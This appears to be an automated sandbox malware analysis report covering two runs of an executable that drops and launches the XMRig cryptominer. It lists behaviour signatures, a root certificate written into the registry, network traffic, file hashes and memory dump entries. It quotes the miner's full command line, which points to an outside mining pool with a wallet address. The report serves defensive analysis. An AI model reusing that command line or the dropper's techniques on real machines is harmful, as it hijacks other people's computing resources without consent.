memory/2584-47-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-48-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-49-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-50-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-51-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-52-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-53-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-54-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-55-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-56-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-57-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-58-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-59-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-60-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-61-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-62-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-63-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-64-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-65-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-66-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-67-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-68-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-69-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-70-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-71-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-72-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-73-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-74-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-75-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-76-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-77-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-78-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-79-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-80-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-81-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-82-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-83-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
memory/2584-84-0x00007FF68A790000-0x00007FF68B293000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:49
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2304 wrote to memory of 3084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2304 wrote to memory of 3084 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3084-16-0x0000016EF0800000-0x0000016EF0820000-memory.dmp
memory/3084-17-0x0000016EF0850000-0x0000016EF0870000-memory.dmp
memory/3084-18-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-19-0x0000016EF2130000-0x0000016EF2150000-memory.dmp
memory/3084-20-0x0000016EF2150000-0x0000016EF2170000-memory.dmp
memory/3084-21-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-22-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-24-0x0000016EF2130000-0x0000016EF2150000-memory.dmp
memory/3084-23-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-25-0x0000016EF2150000-0x0000016EF2170000-memory.dmp
memory/3084-26-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-27-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-28-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-29-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-30-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-31-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-32-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-33-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-34-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-35-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-36-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-37-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-38-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-39-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-40-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-41-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-42-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-43-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-44-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-45-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-46-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-47-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-48-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-49-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-50-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-51-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-52-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-53-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-54-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-55-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-56-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-57-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-58-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-59-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-60-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-61-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-62-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-63-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-64-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-65-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-66-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-67-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-68-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-69-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-70-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-71-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-72-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-73-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-74-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-75-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-76-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-77-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-78-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-79-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-80-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-81-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-82-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-83-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
memory/3084-84-0x00007FF6E51F0000-0x00007FF6E5CF3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:51
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1020 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1020 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.211.222.173.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3204-16-0x000002451AE20000-0x000002451AE40000-memory.dmp
memory/3204-17-0x000002451AE50000-0x000002451AE70000-memory.dmp
memory/3204-18-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-19-0x000002451AE70000-0x000002451AE90000-memory.dmp
memory/3204-20-0x000002451AE90000-0x000002451AEB0000-memory.dmp
memory/3204-21-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-22-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-25-0x000002451AE90000-0x000002451AEB0000-memory.dmp
memory/3204-24-0x000002451AE70000-0x000002451AE90000-memory.dmp
memory/3204-23-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-26-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-27-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-28-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-29-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-30-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
memory/3204-31-0x00007FF61F5F0000-0x00007FF6200F3000-memory.dmp
